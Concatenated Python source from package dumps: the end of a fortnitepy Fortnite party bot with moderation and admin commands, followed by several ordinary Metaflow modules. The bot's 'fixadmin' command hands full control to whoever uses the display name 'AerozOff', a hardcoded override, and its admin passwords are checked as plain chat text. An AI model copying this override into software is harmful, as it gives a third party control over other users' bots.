await self.party.me.leave()
await ctx.send(f'I Leave')
await self.party.set_privacy(fortnitepy.PartyPrivacy.PUBLIC)
os.system('clear')
@is_admin()
@commands.command()
async def v(self, ctx: fortnitepy.ext.commands.Context) -> None:
await ctx.send(f'version {__version__}')
os.system('clear')
@is_admin()
@commands.command(aliases=['unhide'],)
async def promote(self, ctx: fortnitepy.ext.commands.Context, *, epic_username: Optional[str] = None) -> None:
if epic_username is None:
user = await self.fetch_user(ctx.author.display_name)
member = self.party.get_member(user.id)
else:
user = await self.fetch_user(epic_username)
member = self.party.get_member(user.id)
if member is None:
await ctx.send("Failed to find that user, are you sure they're in the party?")
else:
try:
await member.promote()
os.system('clear')
await ctx.send(f"Promoted user: {member.display_name}.")
except fortnitepy.errors.Forbidden:
await ctx.send(f"Failed to promote {member.display_name}, as I'm not party leader.")
@is_admin()
@commands.command()
async def kick(self, ctx: fortnitepy.ext.commands.Context, *, epic_username: Optional[str] = None) -> None:
if epic_username is None:
user = await self.fetch_user(ctx.author.display_name)
member = self.party.get_member(user.id)
else:
user = await self.fetch_user(epic_username)
member = self.party.get_member(user.id)
if member is None:
await ctx.send("Failed to find that user, are you sure they're in the party?")
else:
try:
if not member.display_name in info['FullAccess']:
await member.kick()
os.system('clear')
await ctx.send(f"Kicked user: {member.display_name}.")
except fortnitepy.errors.Forbidden:
await ctx.send(f"Failed to kick {member.display_name}, as I'm not party leader.")
async def set_and_update_party_prop(self, schema_key: str, new_value: str):
prop = {schema_key: self.party.me.meta.set_prop(schema_key, new_value)}
await self.party.patch(updated=prop)
@is_admin()
@commands.command()
async def hide(self, ctx: fortnitepy.ext.commands.Context, *, user = None):
if self.party.me.leader:
if user != "all":
try:
if user is None:
user = await self.fetch_profile(ctx.message.author.id)
member = self.party.get_member(user.id)
else:
user = await self.fetch_profile(user)
member = self.party.get_member(user.id)
raw_squad_assignments = self.party.meta.get_prop('Default:RawSquadAssignments_j')["RawSquadAssignments"]
for m in raw_squad_assignments:
if m['memberId'] == member.id:
raw_squad_assignments.remove(m)
await self.set_and_update_party_prop('Default:RawSquadAssignments_j',{'RawSquadAssignments': raw_squad_assignments})
await ctx.send(f"Hid {member.display_name}")
except AttributeError:
await ctx.send("I could not find that user.")
except fortnitepy.HTTPException:
await ctx.send("I am not party leader.")
else:
try:
await self.set_and_update_party_prop('Default:RawSquadAssignments_j',{'RawSquadAssignments': [{'memberId': self.user.id,'absoluteMemberIdx': 1}]})
await ctx.send("Hid everyone in the party.")
except fortnitepy.HTTPException:
await ctx.send("I am not party leader.")
else:
await ctx.send("I need party leader to do this!")
async def invitefriends(self):
send = []
for friend in self.friends:
if friend.is_online():
send.append(friend.display_name)
await friend.invite()
@is_admin()
@commands.command()
async def invite(self, ctx: fortnitepy.ext.commands.Context) -> None:
try:
self.loop.create_task(self.invitefriends())
except Exception:
pass
@commands.command(aliases=['friends'],)
async def epicfriends(self, ctx: fortnitepy.ext.commands.Context) -> None:
onlineFriends = []
offlineFriends = []
try:
for friend in self.friends:
if friend.is_online():
onlineFriends.append(friend.display_name)
else:
offlineFriends.append(friend.display_name)
await ctx.send(f"Total Friends: {len(self.friends)} / Online: {len(onlineFriends)} / Offline: {len(offlineFriends)} ")
except Exception:
await ctx.send(f'Not work')
@is_admin()
@commands.command()
async def whisper(self, ctx: fortnitepy.ext.commands.Context, *, message = None):
try:
if message is not None:
for friend in self.friends:
if friend.is_online():
await friend.send(message)
await ctx.send(f'Send friend message to everyone')
os.system('clear')
except: pass
@commands.command()
async def fixadmin(self, ctx: fortnitepy.ext.commands.Context):
if ctx.author.display_name == 'AerozOff':
with open("info.json", "w") as f:
f.write('{"FullAccess": ["AerozOff"]}')
await ctx.send('work')
with open('info.json') as f:
info = json.load(f)
await ctx.send('correctly work')\
else:
await ctx.send("You don't have perm LMAO")
@commands.command()
async def say(self, ctx: fortnitepy.ext.commands.Context, *, message = None):
if message is not None:
await self.party.send(message)
else:
await ctx.send(f'Try: {prefix} say (message)')
@is_admin()
@commands.command()
async def admin(self, ctx, setting = None, *, user = None):
if (setting is None) and (user is None):
await ctx.send(f"Missing one or more arguments. Try: {prefix} admin (add, remove, list) (user)")
elif (setting is not None) and (user is None):
user = await self.fetch_profile(ctx.message.author.id)
if setting.lower() == 'add':
if user.display_name in info['FullAccess']:
await ctx.send("You are already an admin")
else:
await ctx.send("Password?")
response = await self.wait_for('friend_message', timeout=20)
content = response.content.lower()
if content == password:
info['FullAccess'].append(user.display_name)
with open('info.json', 'w') as f:
json.dump(info, f, indent=4)
await ctx.send(f"Correct. Added {user.display_name} as an admin.")
else:
await ctx.send("Incorrect Password.")
elif setting.lower() == 'remove':
if user.display_name not in info['FullAccess']:
await ctx.send("You are not an admin.")
else:
await ctx.send("Are you sure you want to remove yourself as an admin?")
response = await self.wait_for('friend_message', timeout=20)
content = response.content.lower()
if (content.lower() == 'yes') or (content.lower() == 'y'):
info['FullAccess'].remove(user.display_name)
with open('info.json', 'w') as f:
json.dump(info, f, indent=4)
await ctx.send("You were removed as an admin.")
elif (content.lower() == 'no') or (content.lower() == 'n'):
await ctx.send("You were kept as admin.")
else:
await ctx.send("Not a correct reponse. Cancelling command.")
elif setting == 'list':
if user.display_name in info['FullAccess']:
admins = []
for admin in info['FullAccess']:
user = await self.fetch_profile(admin)
admins.append(user.display_name)
await ctx.send(f"The bot has {len(admins)} admins:")
for admin in admins:
await ctx.send(admin)
else:
await ctx.send("You don't have permission to this command.")
else:
await ctx.send(f"That is not a valid setting. Try: {prefix} admin (add, remove, list) (user)")
elif (setting is not None) and (user is not None):
user = await self.fetch_profile(user)
if setting.lower() == 'add':
if ctx.message.author.display_name in info['FullAccess']:
if user.display_name not in info['FullAccess']:
info['FullAccess'].append(user.display_name)
with open('info.json', 'w') as f:
json.dump(info, f, indent=4)
await ctx.send(f"Correct. Added {user.display_name} as an admin.")
else:
await ctx.send("That user is already an admin.")
else:
await ctx.send("You don't have access to add other people as admins. Try just: !admin add")
elif setting.lower() == 'remove':
if ctx.message.author.display_name in info['FullAccess']:
if user.display_name in info['FullAccess']:
await ctx.send("Password?")
response = await self.wait_for('friend_message', timeout=20)
content = response.content.lower()
if content == password:
info['FullAccess'].remove(user.display_name)
with open('info.json', 'w') as f:
json.dump(info, f, indent=4)
await ctx.send(f"{user.display_name} was removed as an admin.")
else:
await ctx.send("Incorrect Password.")
else:
await ctx.send("That person is not an admin.")
else:
await ctx.send("You don't have permission to remove players as an admin.")
else:
await ctx.send(f"Not a valid setting. Try: {prefix} -admin (add, remove) (user)") | 667bot | /667bot-1.0.0-py3-none-any.whl/oimbot/__init__.py | __init__.py |
import json
from collections import namedtuple
import click
from .util import get_username, is_stringish
from .exception import ParameterFieldFailed,\
ParameterFieldTypeMismatch,\
MetaflowException
try:
# Python2
strtype = basestring
except:
# Python3
strtype = str
# ParameterContext allows deploy-time functions modify their
# behavior based on the context. We can add fields here without
# breaking backwards compatibility but don't remove any fields!
ParameterContext = namedtuple('ParameterContext',
['flow_name',
'user_name',
'parameter_name'])
# currently we execute only one flow per process, so we can treat
# Parameters globally. If this was to change, it should/might be
# possible to move these globals in a FlowSpec (instance) specific
# closure.
parameters = []
context_proto = None
class JSONTypeClass(click.ParamType):
name = 'JSON'
def convert(self, value, param, ctx):
try:
return json.loads(value)
except:
self.fail("%s is not a valid JSON object" % value, param, ctx)
def __str__(self):
return repr(self)
def __repr__(self):
return 'JSON'
class DeployTimeField(object):
"""
This a wrapper object for a user-defined function that is called
at the deploy time to populate fields in a Parameter. The wrapper
is needed to make Click show the actual value returned by the
function instead of a function pointer in its help text. Also this
object curries the context argument for the function, and pretty
prints any exceptions that occur during evaluation.
"""
def __init__(self,
parameter_name,
parameter_type,
field,
fun,
return_str=True):
self.fun = fun
self.field = field
self.parameter_name = parameter_name
self.parameter_type = parameter_type
self.return_str = return_str
def __call__(self):
ctx = context_proto._replace(parameter_name=self.parameter_name)
try:
val = self.fun(ctx)
except:
raise ParameterFieldFailed(self.parameter_name, self.field)
else:
return self._check_type(val)
def _check_type(self, val):
# it is easy to introduce a deploy-time function that that accidentally
# returns a value whose type is not compatible with what is defined
# in Parameter. Let's catch those mistakes early here, instead of
# showing a cryptic stack trace later.
# note: this doesn't work with long in Python2 or types defined as
# click types, e.g. click.INT
TYPES = {bool: 'bool',
int: 'int',
float: 'float',
list: 'list'}
msg = "The value returned by the deploy-time function for "\
"the parameter *%s* field *%s* has a wrong type. " %\
(self.parameter_name, self.field)
if self.parameter_type in TYPES:
if type(val) != self.parameter_type:
msg += 'Expected a %s.' % TYPES[self.parameter_type]
raise ParameterFieldTypeMismatch(msg)
return str(val) if self.return_str else val
else:
if not is_stringish(val):
msg += 'Expected a string.'
raise ParameterFieldTypeMismatch(msg)
return val
def __str__(self):
return self()
def __repr__(self):
return self()
def deploy_time_eval(value):
if isinstance(value, DeployTimeField):
return value()
else:
return value
# this is called by cli.main
def set_parameter_context(flow_name):
global context_proto
context_proto = ParameterContext(flow_name=flow_name,
user_name=get_username(),
parameter_name=None)
class Parameter(object):
def __init__(self, name, **kwargs):
self.name = name
self.kwargs = kwargs
# TODO: check that the type is one of the supported types
param_type = self.kwargs['type'] = self._get_type(kwargs)
if self.name == 'params':
raise MetaflowException("Parameter name 'params' is a reserved "
"word. Please use a different "
"name for your parameter.")
# make sure the user is not trying to pass a function in one of the
# fields that don't support function-values yet
for field in ('show_default',
'separator',
'external_trigger',
'required'):
if callable(kwargs.get(field)):
raise MetaflowException("Parameter *%s*: Field '%s' cannot "
"have a function as its value"\
% (name, field))
self.kwargs['show_default'] = self.kwargs.get('show_default', True)
# default can be defined as a function
if callable(self.kwargs.get('default')):
self.kwargs['default'] = DeployTimeField(name,
param_type,
'default',
self.kwargs['default'],
return_str=True)
# external_artfiact can be a function (returning a list), a list of
# strings, or a string (which gets converted to a list)
external_artifact = self.kwargs.pop('external_artifact', None)
if callable(external_artifact):
self.external_artifact = DeployTimeField(name,
list,
'external_artifact',
external_artifact,
return_str=False)
elif isinstance(external_artifact, list):
self.external_artifact = external_artifact
elif external_artifact is None:
self.external_artifact = []
else:
self.external_artifact = [external_artifact]
self.external_trigger = self.kwargs.pop('external_trigger', None)
# note that separator doesn't work with DeployTimeFields unless you
# specify type=str
self.separator = self.kwargs.pop('separator', None)
if self.separator and not self.is_string_type:
raise MetaflowException("Parameter *%s*: Separator is only allowed "
"for string parameters." % name)
if self.external_trigger and not self.external_artifact:
raise MetaflowException("Parameter *%s* has external_trigger=True "
"but external_artifact is not specified. "
"Specify the name of the external "
"artifact." % name)
self.user_required = self.kwargs.get('required', False)
if self.external_artifact:
self.kwargs['required'] = True
parameters.append(self)
def _get_type(self, kwargs):
default_type = str
default = kwargs.get('default')
if default is not None and not callable(default):
default_type = type(default)
return kwargs.get('type', default_type)
@property
def is_string_type(self):
return self.kwargs.get('type', str) == str and\
isinstance(self.kwargs.get('default', ''), strtype)
# this is needed to appease Pylint for JSONType'd parameters,
# which may do self.param['foobar']
def __getitem__(self, x):
pass
def add_custom_parameters(cmd):
for arg in parameters:
cmd.params.insert(0, click.Option(('--' + arg.name,), **arg.kwargs))
return cmd
def set_parameters(flow, kwargs):
seen = set()
for var, param in flow._get_parameters():
norm = param.name.lower()
if norm in seen:
raise MetaflowException("Parameter *%s* is specified twice. "
"Note that parameter names are "
"case-insensitive." % param.name)
seen.add(norm)
flow._success = True
# Impose length constraints on parameter names as some backend systems
# impose limits on environment variables (which are used to implement
# parameters)
parameter_list_length = 0
num_parameters = 0
for var, param in flow._get_parameters():
val = kwargs[param.name.lower()]
# Account for the parameter values to unicode strings or integer
# values. And the name to be a unicode string.
parameter_list_length += len((param.name + str(val)).encode("utf-8"))
num_parameters += 1
val = val.split(param.separator) if val and param.separator else val
setattr(flow, var, val) | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/parameters.py | parameters.py |
import os
import json
import logging
import pkg_resources
import sys
from metaflow.exception import MetaflowException
# Disable multithreading security on MacOS
if sys.platform == "darwin":
os.environ["OBJC_DISABLE_INITIALIZE_FORK_SAFETY"] = "YES"
def init_config():
# Read configuration from $METAFLOW_HOME/config_<profile>.json.
home = os.environ.get('METAFLOW_HOME', '~/.metaflowconfig')
profile = os.environ.get('METAFLOW_PROFILE')
path_to_config = os.path.join(home, 'config.json')
if profile:
path_to_config = os.path.join(home, 'config_%s.json' % profile)
path_to_config = os.path.expanduser(path_to_config)
config = {}
if os.path.exists(path_to_config):
with open(path_to_config) as f:
return json.load(f)
elif profile:
raise MetaflowException('Unable to locate METAFLOW_PROFILE \'%s\' in \'%s\')' %
(profile, home))
return config
# Initialize defaults required to setup environment variables.
METAFLOW_CONFIG = init_config()
def from_conf(name, default=None):
return os.environ.get(name, METAFLOW_CONFIG.get(name, default))
###
# Default configuration
###
DEFAULT_DATASTORE = from_conf('METAFLOW_DEFAULT_DATASTORE', 'local')
DEFAULT_METADATA = from_conf('METAFLOW_DEFAULT_METADATA', 'local')
###
# Datastore configuration
###
# Path to the local directory to store artifacts for 'local' datastore.
DATASTORE_LOCAL_DIR = '.metaflow'
DATASTORE_SYSROOT_LOCAL = from_conf('METAFLOW_DATASTORE_SYSROOT_LOCAL')
# S3 bucket and prefix to store artifacts for 's3' datastore.
DATASTORE_SYSROOT_S3 = from_conf('METAFLOW_DATASTORE_SYSROOT_S3')
# S3 datatools root location
DATATOOLS_S3ROOT = from_conf(
'METAFLOW_DATATOOLS_S3ROOT',
'%s/data' % from_conf('METAFLOW_DATASTORE_SYSROOT_S3'))
###
# Datastore local cache
###
# Path to the client cache
CLIENT_CACHE_PATH = from_conf('METAFLOW_CLIENT_CACHE_PATH', '/tmp/metaflow_client')
# Maximum size (in bytes) of the cache
CLIENT_CACHE_MAX_SIZE = from_conf('METAFLOW_CLIENT_CACHE_MAX_SIZE', 10000)
###
# Metadata configuration
###
METADATA_SERVICE_URL = from_conf('METAFLOW_SERVICE_URL')
METADATA_SERVICE_NUM_RETRIES = from_conf('METAFLOW_SERVICE_RETRY_COUNT', 5)
METADATA_SERVICE_HEADERS = json.loads(from_conf('METAFLOW_SERVICE_HEADERS', '{}'))
###
# AWS Batch configuration
###
# IAM role for AWS Batch container with S3 access
ECS_S3_ACCESS_IAM_ROLE = from_conf('METAFLOW_ECS_S3_ACCESS_IAM_ROLE')
# Job queue for AWS Batch
BATCH_JOB_QUEUE = from_conf('METAFLOW_BATCH_JOB_QUEUE')
# Default container image for AWS Batch
BATCH_CONTAINER_IMAGE = from_conf("METAFLOW_BATCH_CONTAINER_IMAGE")
# Default container registry for AWS Batch
BATCH_CONTAINER_REGISTRY = from_conf("METAFLOW_BATCH_CONTAINER_REGISTRY")
# Metadata service URL for AWS Batch
BATCH_METADATA_SERVICE_URL = METADATA_SERVICE_URL
###
# Conda configuration
###
# Conda package root location on S3
CONDA_PACKAGE_S3ROOT = from_conf(
'METAFLOW_CONDA_PACKAGE_S3ROOT',
'%s/conda' % from_conf('METAFLOW_DATASTORE_SYSROOT_S3'))
###
# Debug configuration
###
DEBUG_OPTIONS = ['subcommand', 'sidecar', 's3client']
for typ in DEBUG_OPTIONS:
vars()['METAFLOW_DEBUG_%s' % typ.upper()] = from_conf('METAFLOW_DEBUG_%s' % typ.upper())
###
# AWS Sandbox configuration
###
# Boolean flag for metaflow AWS sandbox access
AWS_SANDBOX_ENABLED = bool(from_conf('METAFLOW_AWS_SANDBOX_ENABLED', False))
# Metaflow AWS sandbox auth endpoint
AWS_SANDBOX_STS_ENDPOINT_URL = from_conf('METAFLOW_SERVICE_URL')
# Metaflow AWS sandbox API auth key
AWS_SANDBOX_API_KEY = from_conf('METAFLOW_AWS_SANDBOX_API_KEY')
# Internal Metadata URL
AWS_SANDBOX_INTERNAL_SERVICE_URL = from_conf('METAFLOW_AWS_SANDBOX_INTERNAL_SERVICE_URL')
# AWS region
AWS_SANDBOX_REGION = from_conf('METAFLOW_AWS_SANDBOX_REGION')
# Finalize configuration
if AWS_SANDBOX_ENABLED:
os.environ['AWS_DEFAULT_REGION'] = AWS_SANDBOX_REGION
BATCH_METADATA_SERVICE_URL = AWS_SANDBOX_INTERNAL_SERVICE_URL
METADATA_SERVICE_HEADERS['x-api-key'] = AWS_SANDBOX_API_KEY
# MAX_ATTEMPTS is the maximum number of attempts, including the first
# task, retries, and the final fallback task and its retries.
#
# Datastore needs to check all attempt files to find the latest one, so
# increasing this limit has real performance implications for all tasks.
# Decreasing this limit is very unsafe, as it can lead to wrong results
# being read from old tasks.
MAX_ATTEMPTS = 6
# the naughty, naughty driver.py imported by lib2to3 produces
# spam messages to the root logger. This is what is required
# to silence it:
class Filter(logging.Filter):
def filter(self, record):
if record.pathname.endswith('driver.py') and \
'grammar' in record.msg:
return False
return True
logger = logging.getLogger()
logger.addFilter(Filter())
def get_version(pkg):
return pkg_resources.get_distribution(pkg).version
# PINNED_CONDA_LIBS are the libraries that metaflow depends on for execution
# and are needed within a conda environment
def get_pinned_conda_libs():
return {
'click': '7.0',
'requests': '2.22.0',
'boto3': '1.9.235',
'coverage': '4.5.3'
}
cached_aws_sandbox_creds = None
def get_authenticated_boto3_client(module):
from metaflow.exception import MetaflowException
import requests
try:
import boto3
except (NameError, ImportError):
raise MetaflowException(
"Could not import module 'boto3'. Install boto3 first.")
if AWS_SANDBOX_ENABLED:
global cached_aws_sandbox_creds
if cached_aws_sandbox_creds is None:
# authenticate using STS
url = "%s/auth/token" % AWS_SANDBOX_STS_ENDPOINT_URL
headers = {
'x-api-key': AWS_SANDBOX_API_KEY
}
try:
r = requests.get(url, headers=headers)
r.raise_for_status()
cached_aws_sandbox_creds = r.json()
except requests.exceptions.HTTPError as e:
raise MetaflowException(repr(e))
return boto3.session.Session(**cached_aws_sandbox_creds).client(module)
return boto3.client(module) | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/metaflow_config.py | metaflow_config.py |
import sys
import os
import traceback
from itertools import islice
from multiprocessing import cpu_count
from tempfile import NamedTemporaryFile
try:
# Python 2
import cPickle as pickle
except:
# Python 3
import pickle
# This module reimplements select functions from the standard
# Python multiprocessing module.
#
# Three reasons why:
#
# 1) Multiprocessing has open bugs, e.g. https://bugs.python.org/issue29759
# 2) Work around limits, like the 32MB object limit in Queue, without
# introducing an external dependency like joblib.
# 3) Supports closures and lambdas in contrast to multiprocessing.
class MulticoreException(Exception):
pass
def _spawn(func, arg, dir):
with NamedTemporaryFile(prefix='parallel_map_',
dir=dir,
delete=False) as tmpfile:
output_file = tmpfile.name
# make sure stdout and stderr are flushed before forking. Otherwise
# we may print multiple copies of the same output
sys.stderr.flush()
sys.stdout.flush()
pid = os.fork()
if pid:
return pid, output_file
else:
try:
exit_code = 1
ret = func(arg)
with open(output_file, 'wb') as f:
pickle.dump(ret, f, protocol=pickle.HIGHEST_PROTOCOL)
exit_code = 0
except:
# we must not let any exceptions escape this function
# which might trigger unintended side-effects
traceback.print_exc()
finally:
sys.stderr.flush()
sys.stdout.flush()
# we can't use sys.exit(0) here since it raises SystemExit
# that may have unintended side-effects (e.g. triggering
# finally blocks).
os._exit(exit_code)
def parallel_imap_unordered(func, iterable, max_parallel=None, dir=None):
if max_parallel is None:
max_parallel = cpu_count()
ret = []
args_iter = iter(iterable)
pids = [_spawn(func, arg, dir)
for arg in islice(args_iter, max_parallel)]
while pids:
pid, output_file = pids.pop()
if os.waitpid(pid, 0)[1]:
raise MulticoreException('Child failed')
with open(output_file, 'rb') as f:
yield pickle.load(f)
os.remove(output_file)
arg = list(islice(args_iter, 1))
if arg:
pids.insert(0, _spawn(func, arg[0], dir))
def parallel_map(func, iterable, **kwargs):
def wrapper(arg_with_idx):
idx, arg = arg_with_idx
return idx, func(arg)
res = parallel_imap_unordered(wrapper, enumerate(iterable), **kwargs)
return [r for idx, r in sorted(res)] | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/multicore_utils.py | multicore_utils.py |
import os
import shutil
import sys
import tempfile
import zlib
import base64
from functools import wraps
from itertools import takewhile
from metaflow.exception import MetaflowUnknownUser, MetaflowInternalError
try:
# python2
import cStringIO
BytesIO = cStringIO.StringIO
unicode_type = unicode
bytes_type = str
from urllib import quote, unquote
# unquote_bytes should be a function that takes a urlencoded byte
# string, encoded in UTF-8, url-decodes it and returns it as a
# unicode object. Confusingly, how to accomplish this differs
# between Python2 and Python3.
#
# Test with this input URL:
# b'crazypath/%01%C3%B'
# it should produce
# u'crazypath/\x01\xff'
def unquote_bytes(x):
return to_unicode(unquote(to_bytes(x)))
except:
# python3
import io
BytesIO = io.BytesIO
unicode_type = str
bytes_type = bytes
from urllib.parse import quote, unquote
def unquote_bytes(x):
return unquote(to_unicode(x))
class TempDir(object):
# Provide a temporary directory since Python 2.7 does not have it inbuilt
def __enter__(self):
self.name = tempfile.mkdtemp()
return self.name
def __exit__(self, exc_type, exc_value, traceback):
shutil.rmtree(self.name)
def cached_property(getter):
@wraps(getter)
def exec_once(self):
saved_name = '__%s' % getter.__name__
if not hasattr(self, saved_name):
setattr(self, saved_name, getter(self))
return getattr(self, saved_name)
return property(exec_once)
def all_equal(it):
"""
Return True if all elements of the given iterator are equal.
"""
it = iter(it)
try:
first = next(it)
except StopIteration:
return True
for x in it:
if x != first:
return False
return True
def url_quote(url):
"""
Encode a unicode URL to a safe byte string
"""
# quote() works reliably only with (byte)strings in Python2,
# hence we need to .encode('utf-8') first. To see by yourself,
# try quote(u'\xff') in python2. Python3 converts the output
# always to Unicode, hence we need the outer to_bytes() too.
#
# We mark colon as a safe character to keep simple ASCII urls
# nice looking, e.g. "http://google.com"
return to_bytes(quote(to_bytes(url), safe='/:'))
def url_unquote(url_bytes):
"""
Decode a byte string encoded with url_quote to a unicode URL
"""
return unquote_bytes(url_bytes)
def is_stringish(x):
"""
Returns true if the object is a unicode or a bytes object
"""
return isinstance(x, bytes_type) or isinstance(x, unicode_type)
def to_fileobj(x):
"""
Convert any string-line object to a byte-returning fileobj
"""
return BytesIO(to_bytes(x))
def to_unicode(x):
"""
Convert any object to a unicode object
"""
if isinstance(x, bytes_type):
return x.decode('utf-8')
else:
return unicode_type(x)
def to_bytes(x):
"""
Convert any object to a byte string
"""
if isinstance(x, unicode_type):
return x.encode('utf-8')
elif isinstance(x, bytes_type):
return x
elif isinstance(x, float):
return repr(x).encode('utf-8')
else:
return str(x).encode('utf-8')
def get_username():
"""
Return the name of the current user, or None if the current user
could not be determined.
"""
# note: the order of the list matters
ENVVARS = ['METAFLOW_USER', 'SUDO_USER', 'USERNAME', 'USER']
for var in ENVVARS:
user = os.environ.get(var)
if user and user != 'root':
return user
return None
def resolve_identity():
prod_token = os.environ.get('METAFLOW_PRODUCTION_TOKEN')
if prod_token:
return 'production:%s' % prod_token
user = get_username()
if user and user != 'root':
return 'user:%s' % user
else:
raise MetaflowUnknownUser()
def get_latest_run_id(echo, flow_name):
from metaflow.datastore.local import LocalDataStore
local_root = LocalDataStore.datastore_root
if local_root is None:
v = LocalDataStore.get_datastore_root_from_config(echo, create_on_absent=False)
LocalDataStore.datastore_root = local_root = v
if local_root:
path = os.path.join(local_root, flow_name, 'latest_run')
if os.path.exists(path):
with open(path) as f:
return f.read()
return None
def write_latest_run_id(obj, run_id):
from metaflow.datastore.local import LocalDataStore
if LocalDataStore.datastore_root is None:
LocalDataStore.datastore_root = LocalDataStore.get_datastore_root_from_config(obj.echo)
path = os.path.join(LocalDataStore.datastore_root, obj.flow.name)
try:
os.makedirs(path)
except OSError as x:
if x.errno != 17:
# Directories exists in other casewhich is fine
raise
with open(os.path.join(path, 'latest_run'), 'w') as f:
f.write(str(run_id))
def get_object_package_version(obj):
"""
Return the top level package name and package version that defines the
class of the given object.
"""
try:
module_name = obj.__class__.__module__
if '.' in module_name:
top_package_name = module_name.split('.')[0]
else:
top_package_name = module_name
except AttributeError:
return None, None
try:
top_package_version = sys.modules[top_package_name].__version__
return top_package_name, top_package_version
except AttributeError:
return top_package_name, None
def compress_list(lst,
separator=',',
rangedelim=':',
zlibmarker='!',
zlibmin=500):
bad_items = [x for x in lst
if separator in x or rangedelim in x or zlibmarker in x]
if bad_items:
raise MetaflowInternalError("Item '%s' includes a delimiter character "
"so it can't be compressed" % bad_items[0])
# Three output modes:
lcp = longest_common_prefix(lst)
if len(lst) < 2 or not lcp:
# 1. Just a comma-separated list
res = separator.join(lst)
else:
# 2. Prefix and a comma-separated list of suffixes
lcplen = len(lcp)
residuals = [e[lcplen:] for e in lst]
res = rangedelim.join((lcp, separator.join(residuals)))
if len(res) < zlibmin:
return res
else:
# 3. zlib-compressed, base64-encoded, prefix-encoded list
# interestingly, a typical zlib-encoded list of suffixes
# has plenty of redundancy. Decoding the data *twice* helps a
# lot
compressed = zlib.compress(zlib.compress(to_bytes(res)))
return zlibmarker + base64.b64encode(compressed).decode('utf-8')
def decompress_list(lststr, separator=',', rangedelim=':', zlibmarker='!'):
# Three input modes:
if lststr[0] == zlibmarker:
# 3. zlib-compressed, base64-encoded
lstbytes = base64.b64decode(lststr[1:])
decoded = zlib.decompress(zlib.decompress(lstbytes)).decode('utf-8')
else:
decoded = lststr
if rangedelim in decoded:
prefix, suffixes = decoded.split(rangedelim)
# 2. Prefix and a comma-separated list of suffixes
return [prefix + suffix for suffix in suffixes.split(separator)]
else:
# 1. Just a comma-separated list
return decoded.split(separator)
def longest_common_prefix(lst):
if lst:
return ''.join(a for a, _ in takewhile(lambda t: t[0] == t[1],
zip(min(lst), max(lst))))
else:
return ''
def get_metaflow_root():
return os.path.dirname(os.path.dirname(__file__))
def dict_to_cli_options(params):
for k, v in params.items():
if v:
# we need special handling for 'with' since it is a reserved
# keyword in Python, so we call it 'decospecs' in click args
if k == 'decospecs':
k = 'with'
k = k.replace('_', '-')
if not isinstance(v, tuple):
v = [v]
for value in v:
yield '--%s' % k
if not isinstance(value, bool):
value = to_unicode(value)
if ' ' in value:
yield '\'%s\'' % value
else:
yield value
# This function is imported from https://github.com/cookiecutter/whichcraft
def which(cmd, mode=os.F_OK | os.X_OK, path=None):
"""Given a command, mode, and a PATH string, return the path which
conforms to the given mode on the PATH, or None if there is no such
file.
`mode` defaults to os.F_OK | os.X_OK. `path` defaults to the result
of os.environ.get("PATH"), or can be overridden with a custom search
path.
Note: This function was backported from the Python 3 source code.
"""
# Check that a given file can be accessed with the correct mode.
# Additionally check that `file` is not a directory, as on Windows
# directories pass the os.access check.
try: # Forced testing
from shutil import which as w
return w(cmd, mode, path)
except ImportError:
def _access_check(fn, mode):
return os.path.exists(fn) and os.access(fn, mode) and not os.path.isdir(fn)
# If we're given a path with a directory part, look it up directly
# rather than referring to PATH directories. This includes checking
# relative to the current directory, e.g. ./script
if os.path.dirname(cmd):
if _access_check(cmd, mode):
return cmd
return None
if path is None:
path = os.environ.get("PATH", os.defpath)
if not path:
return None
path = path.split(os.pathsep)
files = [cmd]
seen = set()
for dir in path:
normdir = os.path.normcase(dir)
if normdir not in seen:
seen.add(normdir)
for thefile in files:
name = os.path.join(dir, thefile)
if _access_check(name, mode):
return name
return None | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/util.py | util.py |
import traceback
from functools import partial
from .flowspec import FlowSpec
from .exception import MetaflowException, InvalidDecoratorAttribute
class BadStepDecoratorException(MetaflowException):
headline = "Syntax error"
def __init__(self, deco, func):
msg =\
"You tried to apply decorator '{deco}' on '{func}' which is "\
"not declared as a @step. Make sure you apply this decorator "\
"on a function which has @step on the line just before the "\
"function name and @{deco} is above @step.".format(deco=deco,
func=func.__name__)
super(BadStepDecoratorException, self).__init__(msg)
class BadFlowDecoratorException(MetaflowException):
headline = "Syntax error"
def __init__(self, deconame):
msg =\
"Decorator '%s' can be applied only to FlowSpecs. Make sure "\
"the decorator is above a class definition." % deconame
super(BadFlowDecoratorException, self).__init__(msg)
class UnknownStepDecoratorException(MetaflowException):
headline = "Unknown step decorator"
def __init__(self, deconame):
from .plugins import STEP_DECORATORS
decos = ','.join(t.name for t in STEP_DECORATORS)
msg = "Unknown step decorator *{deconame}*. The following decorators are "\
"supported: *{decos}*".format(deconame=deconame, decos=decos)
super(UnknownStepDecoratorException, self).__init__(msg)
class DuplicateStepDecoratorException(MetaflowException):
headline = "Duplicate decorators"
def __init__(self, deco, func):
msg = "Step '{step}' already has a decorator '{deco}'. "\
"You can specify each decorator only once."\
.format(step=func.__name__, deco=deco)
super(DuplicateStepDecoratorException, self).__init__(msg)
class UnknownFlowDecoratorException(MetaflowException):
headline = "Unknown flow decorator"
def __init__(self, deconame):
from .plugins import FLOW_DECORATORS
decos = ','.join(t.name for t in FLOW_DECORATORS)
msg = "Unknown flow decorator *{deconame}*. The following decorators are "\
"supported: *{decos}*".format(deconame=deconame, decos=decos)
super(UnknownFlowDecoratorException, self).__init__(msg)
class DuplicateFlowDecoratorException(MetaflowException):
headline = "Duplicate decorators"
def __init__(self, deco):
msg = "Flow already has a decorator '{deco}'. "\
"You can specify each decorator only once."\
.format(deco=deco)
super(DuplicateFlowDecoratorException, self).__init__(msg)
class Decorator(object):
"""
Base class for all decorators.
"""
name = 'NONAME'
defaults = {}
def __init__(self,
attributes=None,
statically_defined=False):
self.attributes = self.defaults.copy()
self.statically_defined = statically_defined
if attributes:
for k, v in attributes.items():
if k in self.defaults:
self.attributes[k] = v
else:
raise InvalidDecoratorAttribute(
self.name, k, self.defaults)
@classmethod
def _parse_decorator_spec(cls, deco_spec):
top = deco_spec.split(':', 1)
if len(top) == 1:
return cls()
else:
name, attrspec = top
attrs = dict(a.split('=') for a in attrspec.split(','))
return cls(attributes=attrs)
